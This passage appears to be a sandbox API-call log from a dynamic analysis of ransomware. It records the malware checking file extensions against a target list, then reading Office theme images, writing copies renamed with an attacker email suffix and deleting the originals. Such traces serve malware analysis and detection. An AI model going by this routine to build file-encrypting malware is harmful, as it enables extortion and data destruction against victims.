(lpString1=".doc", lpString2=".GIF") returned -1 [0047.235] lstrlenW (lpString=".docx") returned 5 [0047.235] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.235] lstrlenW (lpString=".pdf") returned 4 [0047.235] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString=".xls") returned 4 [0047.235] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString=".xlsx") returned 5 [0047.235] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.235] lstrlenW (lpString=".ppt") returned 4 [0047.235] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString=".zip") returned 4 [0047.235] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString=".rar") returned 4 [0047.235] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString=".bz2") returned 4 [0047.235] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.235] lstrlenW (lpString=".7z") returned 3 [0047.235] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString=".dbf") returned 4 [0047.235] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString=".1cd") returned 4 [0047.235] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString=".jpg") returned 4 [0047.235] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.236] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.236] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.415] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=16738) returned 1 [0047.415] CloseHandle (hObject=0x178) returned 1 [0047.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20 [0047.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.416] GetLastError () returned 0x0 [0047.416] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x4162, lpOverlapped=0x0) returned 1 [0047.419] WriteFile (in: hFile=0x204, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x4170, lpOverlapped=0x0) returned 1 [0047.420] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.420] WriteFile (in: hFile=0x204, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.420] SetEndOfFile (hFile=0x204) returned 1 [0047.420] CloseHandle (hObject=0x204) returned 1 [0047.420] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.420] SetEndOfFile (hFile=0x178) returned 1 [0047.421] CloseHandle (hObject=0x178) returned 1 [0047.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.421] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0047.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.421] lstrlenW (lpString=".doc") returned 4 [0047.421] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.421] lstrlenW (lpString=".docx") returned 5 [0047.421] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.422] lstrlenW (lpString=".pdf") returned 4 [0047.422] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString=".xls") returned 4 [0047.422] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.422] lstrlenW (lpString=".xlsx") returned 5 [0047.422] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.422] lstrlenW (lpString=".ppt") returned 4 [0047.422] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString=".zip") returned 4 [0047.422] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.422] lstrlenW (lpString=".rar") returned 4 [0047.422] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.422] lstrlenW (lpString=".bz2") returned 4 [0047.422] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString=".7z") returned 3 [0047.422] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString=".dbf") returned 4 [0047.422] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString=".1cd") returned 4 [0047.422] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString=".jpg") returned 4 [0047.422] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.422] lstrlenW (lpString=".doc") returned 4 [0047.422] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString=".docx") returned 5 [0047.422] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.422] lstrlenW (lpString=".pdf") returned 4 [0047.422] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.422] lstrlenW (lpString=".xls") returned 4 [0047.422] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.422] lstrlenW (lpString=".xlsx") returned 5 [0047.423] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.423] lstrlenW (lpString=".ppt") returned 4 [0047.423] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.423] lstrlenW (lpString=".zip") returned 4 [0047.423] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.423] lstrlenW (lpString=".rar") returned 4 [0047.423] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.423] lstrlenW (lpString=".bz2") returned 4 [0047.423] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.423] lstrlenW (lpString=".7z") returned 3 [0047.423] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.423] lstrlenW (lpString=".dbf") returned 4 [0047.423] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.423] lstrlenW (lpString=".1cd") returned 4 [0047.423] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0047.423] lstrlenW (lpString=".jpg") returned 4 [0047.423] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.423] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.423] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.465] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=53115) returned 1 [0048.465] CloseHandle (hObject=0x1b4) returned 1 [0048.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 0x20 [0048.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.465] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.465] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.465] GetLastError () returned 0x0 [0048.465] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xcf7b, lpOverlapped=0x0) returned 1 [0048.468] WriteFile (in: hFile=0x218, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xcf80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xcf80, lpOverlapped=0x0) returned 1 [0048.469] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.469] WriteFile (in: hFile=0x218, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.470] SetEndOfFile (hFile=0x218) returned 1 [0048.470] CloseHandle (hObject=0x218) returned 1 [0048.470] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.470] SetEndOfFile (hFile=0x1b4) returned 1 [0048.471] CloseHandle (hObject=0x1b4) returned 1 [0048.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.472] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png")) returned 1 [0048.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.472] lstrlenW (lpString=".doc") returned 4 [0048.472] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.472] lstrlenW (lpString=".docx") returned 5 [0048.472] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.472] lstrlenW (lpString=".pdf") returned 4 [0048.472] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.472] lstrlenW (lpString=".xls") returned 4 [0048.472] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.472] lstrlenW (lpString=".xlsx") returned 5 [0048.472] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.472] lstrlenW (lpString=".ppt") returned 4 [0048.472] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.472] lstrlenW (lpString=".zip") returned 4 [0048.472] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.472] lstrlenW (lpString=".rar") returned 4 [0048.472] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.472] lstrlenW (lpString=".bz2") returned 4 [0048.472] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.472] lstrlenW (lpString=".7z") returned 3 [0048.472] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".dbf") returned 4 [0048.473] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".1cd") returned 4 [0048.473] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".jpg") returned 4 [0048.473] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".doc") returned 4 [0048.473] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString=".docx") returned 5 [0048.473] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.473] lstrlenW (lpString=".pdf") returned 4 [0048.473] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString=".xls") returned 4 [0048.473] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.473] lstrlenW (lpString=".xlsx") returned 5 [0048.473] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.473] lstrlenW (lpString=".ppt") returned 4 [0048.473] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".zip") returned 4 [0048.473] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.473] lstrlenW (lpString=".rar") returned 4 [0048.473] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.473] lstrlenW (lpString=".bz2") returned 4 [0048.473] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.473] lstrlenW (lpString=".7z") returned 3 [0048.473] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.473] lstrlenW (lpString=".dbf") returned 4 [0048.474] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.474] lstrlenW (lpString=".1cd") returned 4 [0048.474] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 77 [0048.474] lstrlenW (lpString=".jpg") returned 4 [0048.474] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.474] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.474] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.474] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=4100) returned 1 [0048.474] CloseHandle (hObject=0x1b4) returned 1 [0048.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 0x20 [0048.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.475] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.475] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.478] GetLastError () returned 0x0 [0048.478] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1004, lpOverlapped=0x0) returned 1 [0048.487] WriteFile (in: hFile=0x220, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1010, lpOverlapped=0x0) returned 1 [0048.488] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.488] WriteFile (in: hFile=0x220, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.488] SetEndOfFile (hFile=0x220) returned 1 [0048.488] CloseHandle (hObject=0x220) returned 1 [0048.489] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.489] SetEndOfFile (hFile=0x1b4) returned 1 [0048.489] CloseHandle (hObject=0x1b4) returned 1 [0048.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.490] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1 [0048.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.490] lstrlenW (lpString=".doc") returned 4 [0048.490] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.490] lstrlenW (lpString=".docx") returned 5 [0048.490] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.490] lstrlenW (lpString=".pdf") returned 4 [0048.490] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.490] lstrlenW (lpString=".xls") returned 4 [0048.490] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.490] lstrlenW (lpString=".xlsx") returned 5 [0048.490] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.490] lstrlenW (lpString=".ppt") returned 4 [0048.490] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.490] lstrlenW (lpString=".zip") returned 4 [0048.490] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.490] lstrlenW (lpString=".rar") returned 4 [0048.490] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.490] lstrlenW (lpString=".bz2") returned 4 [0048.490] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.491] lstrlenW (lpString=".7z") returned 3 [0048.491] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".dbf") returned 4 [0048.491] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".1cd") returned 4 [0048.491] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.491] lstrlenW (lpString=".jpg") returned 4 [0048.491] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.491] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 